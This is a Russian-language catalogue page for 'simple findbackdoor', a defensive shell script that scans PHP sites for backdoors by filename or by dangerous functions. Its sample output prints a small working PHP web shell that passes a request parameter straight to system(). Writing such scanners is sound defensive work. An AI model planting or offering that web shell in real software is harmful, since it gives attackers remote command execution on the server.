simple findbackdoor
Описание simple findbackdoor
Простой скрипт для выявления возможных бэкдоров (backdoor) в файлах PHP. (Хорошо работает для PHP файлов WordPress, например.)
simple findbackdoor осуществляет поиск по потенциально опасным функциям в PHP коде, а также по именам файлов.
Домашняя страница: https://github.com/espreto/simple_findbackdoor
Справка по simple findbackdoor
Испольозвание:
./findbackdoor.sh <директория для сканирования> <1 или 2> <строки>
1 = Искать по именам файлов
2 = Искать по функциям ( <строки> - это количество строк которое нужно вывести до и после подозрительных функций (по умолчанию: 5) )
Руководство по simple findbackdoor
Страница man отсутствует.
Примеры запуска simple findbackdoor
$ ./findbackdoor Invalid option! Use: ./findbackdoor.sh <directory scan> <1 or 2> <lines> 1 = WebShells 2 = Functions ( <lines> is the number of lines before and after the match (default: 5) ) $ ./findbackdoor /tmp/teste/ 1 [+] Possible webshell found! /tmp/teste/c99.php $ ./findbackdoor /tmp/teste/ 2 [+] Possible dangerous function! [+] Last modification in /tmp/teste/ha.php: 2014-10-15 02:14:38.163231500 -0300 1-<?php 2-if(isset($_REQUEST[‘cmd’])){ 3- echo "<pre>"; 4- $cmd = ($_REQUEST[‘cmd’]); 5: system($cmd); 6- echo "</pre>"; 7- die; 8-} 9-?> $ ./findbackdoor /tmp/teste/ 2 1 [+] Possible dangerous function! [+] Last modification in /tmp/teste/ha.php: 2014-10-15 02:14:38.163231500 -0300 4- $cmd = ($_REQUEST[‘cmd’]); 5: system($cmd); 6- echo "</pre>";
Установка simple findbackdoor
Установка в Linux
git clone https://github.com/espreto/simple_findbackdoor.git ./simple_findbackdoor/findbackdoor
Скриншоты simple findbackdoor
Это утилита командной строки.
Инструкции по simple findbackdoor
Ссылки на инструкции будут добавлены позже.
Comments are Closed